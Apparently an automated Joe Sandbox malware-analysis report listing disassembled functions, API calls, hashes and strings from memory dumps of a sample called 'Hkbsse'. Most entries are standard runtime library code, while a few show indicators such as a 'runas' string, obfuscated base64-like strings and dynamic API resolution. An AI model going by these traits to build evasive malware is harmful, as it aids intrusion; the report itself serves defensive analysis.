Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: d572be450a44cd8b9dfe517d28d76e72d339bb5f47be3534d4ed37116ae8838f
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: F2514070A00219EBDF18DF68C595BEDB3A8FF48344F4541A9E945AB281D738AE85CBD0

Function 0042697A Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 004269BF
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 004269F1
List.LIBCONCRT ref: 00426A2C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426A3D
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426A59
List.LIBCONCRT ref: 00426A94
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426AA5
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426AC0
List.LIBCONCRT ref: 00426AFB
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426B08

Part of subcall function 00425E7F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425E97
Part of subcall function 00425E7F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425EA9

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: 6c5ec0742fdc78930775633eb6d6f08c57438a61e6ef12edbc35cd481a970cea
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: 8B518371B00229AFDB04DF55D495BEEB3A8FF08304F4540AEE915A7381DB38AE45CB94

Function 0072A6F0 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0072A706

Part of subcall function 0072AF8C: HeapFree.KERNEL32(00000000,00000000,?,0072F264,?,00000000,?,?,?,0072F28B,?,00000007,?,?,0072F68D,?), ref: 0072AFA2
Part of subcall function 0072AF8C: GetLastError.KERNEL32(?,?,0072F264,?,00000000,?,?,?,0072F28B,?,00000007,?,?,0072F68D,?,?), ref: 0072AFB4

_free.LIBCMT ref: 0072A712
_free.LIBCMT ref: 0072A71D
_free.LIBCMT ref: 0072A728
_free.LIBCMT ref: 0072A733
_free.LIBCMT ref: 0072A73E
_free.LIBCMT ref: 0072A749
_free.LIBCMT ref: 0072A754
_free.LIBCMT ref: 0072A75F
_free.LIBCMT ref: 0072A76D

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction ID: 679b236c882e680ee5db3f5c8bd61d72f8f6572353fa6547db00352d3e99e35a
Opcode Fuzzy Hash: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction Fuzzy Hash: 7A2197B6900118FFCB41EFA4D985DDE7BB9BF08340F0041A6F515AB122DB39EA55CB85

Function 0043A489 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043A49F

Part of subcall function 0043AD25: HeapFree.KERNEL32(00000000,00000000,?,0043EFFD,?,00000000,?,8B18EC83,?,0043F024,?,00000007,?,?,0043F426,?), ref: 0043AD3B
Part of subcall function 0043AD25: GetLastError.KERNEL32(?,?,0043EFFD,?,00000000,?,8B18EC83,?,0043F024,?,00000007,?,?,0043F426,?,?), ref: 0043AD4D

_free.LIBCMT ref: 0043A4AB
_free.LIBCMT ref: 0043A4B6
_free.LIBCMT ref: 0043A4C1
_free.LIBCMT ref: 0043A4CC
_free.LIBCMT ref: 0043A4D7
_free.LIBCMT ref: 0043A4E2
_free.LIBCMT ref: 0043A4ED
_free.LIBCMT ref: 0043A4F8
_free.LIBCMT ref: 0043A506

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction ID: accde1620b69e7dc5d30b098583bcb7cc94c6da36c52d76ac73272e79f6d2f6e
Opcode Fuzzy Hash: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction Fuzzy Hash: 9D21077694010CBFCB01EFA5D881CDE7BB9BF08349F00A0AAF5459B521DB39EA54CB85

Function 0073586A Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da50fe00c732b4ae37190dc2fdf082dd6f1081c8479b63f71d3ca4b37ed86d37
Instruction ID: d3422ae3f139261ccbdca794f0683cfe17d772f1ce8efdb184c923b330254b2b
Opcode Fuzzy Hash: da50fe00c732b4ae37190dc2fdf082dd6f1081c8479b63f71d3ca4b37ed86d37
Instruction Fuzzy Hash: 70C1F1B0A08749EFEF15DFA8D884BADBBB0BF09310F044169E445AB393D7789941CB65

Function 00717AE8 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00717B0A

Part of subcall function 00715EBF: __EH_prolog3_catch.LIBCMT ref: 00715EC6
Part of subcall function 00715EBF: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00715EFF

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00717B18

Part of subcall function 00716B24: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00716B49
Part of subcall function 00716B24: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00716B6C

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00717B31
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00717B3D

Part of subcall function 00715EBF: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00715F48
Part of subcall function 00715EBF: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00715F77
Part of subcall function 00715EBF: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00715F85

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00717B89
Concurrency::location::_Assign.LIBCMT ref: 00717BAA
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00717BB2
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00717BC4
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00717BF4

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 41b99012b005fe8af3ce5f36bd7a0eadcaa3aaa0fcf2c16a82b6b309eba6aa24
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: E931E670B0C255AACF2EAA7C48967FEB7B55F45700F0440A9D856D72C2DB2D4DC9C391

Function 00720B8C Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00720BA2
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00715EB5,?), ref: 00720BB4
GetCurrentThread.KERNEL32 ref: 00720BBC
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00715EB5,?), ref: 00720BC4
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00715EB5,?), ref: 00720BDD
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00720BFE

Part of subcall function 00710418: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00710432

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00715EB5,?), ref: 00720C10
GetLastError.KERNEL32(?,?,?,?,?,00715EB5,?), ref: 00720C3B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00720C51

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: 4a37a2409866743f2febd61ffa374258c3d3713468b6766a7e2dd0bdbf4a3453
Instruction ID: 9fa0f46e747239a1ebbb46d200d127e5c1016a0e140c65e4afe54f52a68f7b8a
Opcode Fuzzy Hash: 4a37a2409866743f2febd61ffa374258c3d3713468b6766a7e2dd0bdbf4a3453
Instruction Fuzzy Hash: D711E4B5600315EBD710AB74AD8EFDA3BA8AF05701F180175FD49DA193EA78C94087B6

Function 00430925 Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0043093B
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425C4E,?), ref: 0043094D
GetCurrentThread.KERNEL32 ref: 00430955
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425C4E,?), ref: 0043095D
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00425C4E,?), ref: 00430976
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00430997

Part of subcall function 004201B1: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004201CB

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00425C4E,?), ref: 004309A9
GetLastError.KERNEL32(?,?,?,?,?,00425C4E,?), ref: 004309D4
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004309EA

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: 576db7eb1a9148e612a0feffeba5b5faaa13144d5fd666c6eb7ba3ebc8083f8a
Instruction ID: ea2d67e05215490eae4a913c2035f6bbbbaa4a2066a87e48ed43ce4d7d3c4a4b
Opcode Fuzzy Hash: 576db7eb1a9148e612a0feffeba5b5faaa13144d5fd666c6eb7ba3ebc8083f8a
Instruction Fuzzy Hash: 7711D2B5640301ABEB10AB75AD5AB9B3BA89F09701F180176FD45E6253EA78C900C77E

Function 007326AE Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00732730
_free.LIBCMT ref: 00732754
_free.LIBCMT ref: 007328E1
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 007328F3
_free.LIBCMT ref: 00732AAD

Strings

XgE, xrefs: 00732A10
XgE, xrefs: 0073289C, 007328A2

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: XgE$XgE
API String ID: 597776487-1765908331
Opcode ID: 8228ff0cba050116092ccc0bd45159c27ecdf62f726296749907114807962759
Instruction ID: 5dc13726c341d0a4e2dfa146092d517ee20de0e638c1ec952a33f578d569ac73
Opcode Fuzzy Hash: 8228ff0cba050116092ccc0bd45159c27ecdf62f726296749907114807962759
Instruction Fuzzy Hash: 13C14871A00218EFEB24AF68DC45BEA7BB9EF55310F1441A9E584A7293E73C9D43C790

Function 0072EC25 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0072EC4F
_free.LIBCMT ref: 0072ED28
_free.LIBCMT ref: 0072ED55

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 964050cfe98b64ad5f12aef5ac0cd2ae03c2c3a42526229d66b7e1ab66c6f8a8
Instruction ID: a105205e29a59701da0dc88f8dc3176671455abd8ea51a7f084fefd69f324d40
Opcode Fuzzy Hash: 964050cfe98b64ad5f12aef5ac0cd2ae03c2c3a42526229d66b7e1ab66c6f8a8
Instruction Fuzzy Hash: 3C5107B1E08271EFEF24AFB4F845A6D7BA4AF01310F15416EF52097281EB7E8941CB65

Function 0043E9BE Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0043E9E8
_free.LIBCMT ref: 0043EAC1
_free.LIBCMT ref: 0043EAEE

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 53519b4959507ecfa4a6b8fe2626ce4c1d7568e2bc8af9a9713fc5bbfcf2daeb
Instruction ID: 06afcfd1c582bfe624e0dbbeff077fdcc99dfcf8c6a83b3b8f040a8f85707c39
Opcode Fuzzy Hash: 53519b4959507ecfa4a6b8fe2626ce4c1d7568e2bc8af9a9713fc5bbfcf2daeb
Instruction Fuzzy Hash: 02515970909205AFDB21EF67D841A6EBBA4EF0D314F10606FF511972C1EA7DA901CB5D

Function 006F7927 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 468sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 006F7BF0

Strings

G7==, xrefs: 006F7CE2
WS1f, xrefs: 006F7B7B
runas, xrefs: 006F747A
JSsb, xrefs: 006F7B48

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: G7==$JSsb$WS1f$runas
API String ID: 3472027048-3395963777
Opcode ID: 7c7bb8e5305ff4923c0f45b9453b115b08ebd54b08192de8eff7d9096025f458
Instruction ID: 2d0e9edc0d1c8ff48eb9e2898828c6cc3953b8bbbd336567b6e9e5f01ea164f7
Opcode Fuzzy Hash: 7c7bb8e5305ff4923c0f45b9453b115b08ebd54b08192de8eff7d9096025f458
Instruction Fuzzy Hash: 30E13A71A14248EBDB08EB78CD4A7AD7B72AF41314F20829CF4119B3C6DB799E44C796

Function 007270D8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141pipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 007270FA
GetFileInformationByHandle.KERNEL32(?,?), ref: 00727154
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0072700A,?,000000FF), ref: 007271E2
__dosmaperr.LIBCMT ref: 007271E9
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00727226

Part of subcall function 0072744E: __dosmaperr.LIBCMT ref: 00727483

Strings

pr, xrefs: 0072720E

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID: pr
API String ID: 1206951868-1675769122
Opcode ID: efefd2ded84382f9e951c6311a9ec95217b47005859bbaf9a6cf84a928e8ddad
Instruction ID: 7dbde60f4baba00558f713b7319fc159486d3d3271d23a31e6684af4a619da13
Opcode Fuzzy Hash: efefd2ded84382f9e951c6311a9ec95217b47005859bbaf9a6cf84a928e8ddad
Instruction Fuzzy Hash: C5414A75904758EBCB28DFA5ED459ABBBF9FF88300B104529F956D3610E638A800CB21

Function 006FBAC7 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 130COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006FBB2E

Strings

d4F, xrefs: 006FE4B6
9xRVfBowNz==, xrefs: 006FC492, 006FC6EA
9xRVfFM7NB4=, xrefs: 006FC52C
ScVo, xrefs: 006FD6BD
Su9OYy==, xrefs: 006FBFDA
`?|, xrefs: 006FCBC4, 006FCD9F

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: 9xRVfBowNz==$9xRVfFM7NB4=$ScVo$Su9OYy==$`?|$d4F
API String ID: 2538663250-636491367
Opcode ID: 567a2f6c2d73d0a668c2b31db1d1c7200d480fdd652e40275442b365b8f0afd6
Instruction ID: 710850e5d899bd902ff3db6598a2dd8844309f5ed704814afbe1cc9a88293258
Opcode Fuzzy Hash: 567a2f6c2d73d0a668c2b31db1d1c7200d480fdd652e40275442b365b8f0afd6
Instruction Fuzzy Hash: 7A41C331A00208EFDB08CF68CC89BAE7BB6EF48711F108558F506EB295DB75E940CB95

Function 004347E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00434817
___except_validate_context_record.LIBVCRUNTIME ref: 0043481F
_ValidateLocalCookies.LIBCMT ref: 004348A8
__IsNonwritableInCurrentImage.LIBCMT ref: 004348D3
_ValidateLocalCookies.LIBCMT ref: 00434928

Strings

csm, xrefs: 004348BD

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 77b69c8082a5c7def3f7ee5e725d4c43df701a32bc9849ca49db4ec88c045bc2
Instruction ID: 551be3216cefd7dd097f7e0cef18fa31428cdd1af678a7a778540666fbc215f8
Opcode Fuzzy Hash: 77b69c8082a5c7def3f7ee5e725d4c43df701a32bc9849ca49db4ec88c045bc2
Instruction Fuzzy Hash: 4341EB38D00244AFCF14EF69C844ADE7BB5EF89328F14905BE9145B392D779E901CB95

Function 0071E9B6 Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0071E9DE

Part of subcall function 0071E74B: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0071E77E
Part of subcall function 0071E74B: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0071E7A0

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0071EA5B
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0071EA67
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0071EA76
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0071EA80
Concurrency::location::_Assign.LIBCMT ref: 0071EAB4
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0071EABC

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction ID: 8f1fee9b34ca41ce0713a7ef6359a508f79516997595b047469ae69a6abffbeb
Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction Fuzzy Hash: 74413035A00218DFCB05EF68C499BADB7B5FF48310F1485A5DD459B382D734AD81CB91

Function 0042E74F Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E777

Part of subcall function 0042E4E4: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E517
Part of subcall function 0042E4E4: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E539

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E7F4
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E800
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E80F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E819
Concurrency::location::_Assign.LIBCMT ref: 0042E84D
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E855

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction ID: e82e8883490ce4a26c3de05762ad6604feec17dd3642b743c113e4f0b087f588
Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction Fuzzy Hash: 93414B39B002149FCF01EF65D884AADB7B5FF48314F5484AAED499B382DB34A941CB95

Function 0070F066 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070F06D
_SpinWait.LIBCONCRT ref: 0070F0C3
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0070F0CF
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0070F0E8
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0070F116
Concurrency::Context::Block.LIBCONCRT ref: 0070F138

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::H_prolog3ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1888882079-0
Opcode ID: 6fc47b2fad7041e8737b7033859bcf88e87cfd797c7cdb07b4920cce283e2b2d
Instruction ID: 75ea6eca623ad3df09d4abf4646049130fb3bdf3f95e289fdb317556b2d3553b
Opcode Fuzzy Hash: 6fc47b2fad7041e8737b7033859bcf88e87cfd797c7cdb07b4920cce283e2b2d
Instruction Fuzzy Hash: 01214F70D0021DDADF34DFA4D849AEEB7F0AF14310F204B2AE151A65D1EBB94A85CB55

Function 0072F272 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0072F23A: _free.LIBCMT ref: 0072F25F

_free.LIBCMT ref: 0072F2C0

Part of subcall function 0072AF8C: HeapFree.KERNEL32(00000000,00000000,?,0072F264,?,00000000,?,?,?,0072F28B,?,00000007,?,?,0072F68D,?), ref: 0072AFA2
Part of subcall function 0072AF8C: GetLastError.KERNEL32(?,?,0072F264,?,00000000,?,?,?,0072F28B,?,00000007,?,?,0072F68D,?,?), ref: 0072AFB4

_free.LIBCMT ref: 0072F2CB
_free.LIBCMT ref: 0072F2D6
_free.LIBCMT ref: 0072F32A
_free.LIBCMT ref: 0072F335
_free.LIBCMT ref: 0072F340
_free.LIBCMT ref: 0072F34B

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction ID: 9d83efc9bcf6463f6d4eec9789ee1aee09e76c370bf316d0f4a5f9d63eb4d1d7
Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction Fuzzy Hash: 46116DB6545B24FAD520B7B0EC0BFCB7BEC6F09704F404835B69966052DB7CA5064B51

Function 0070FC78 Relevance: 10.6, APIs: 7, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(004512B4,?,00000000,00000000,?,?,?,00713DED), ref: 0070FC86
GetProcAddress.KERNEL32(00000000,0045177C), ref: 0070FC94
GetProcAddress.KERNEL32(00000000,00451794), ref: 0070FCA2
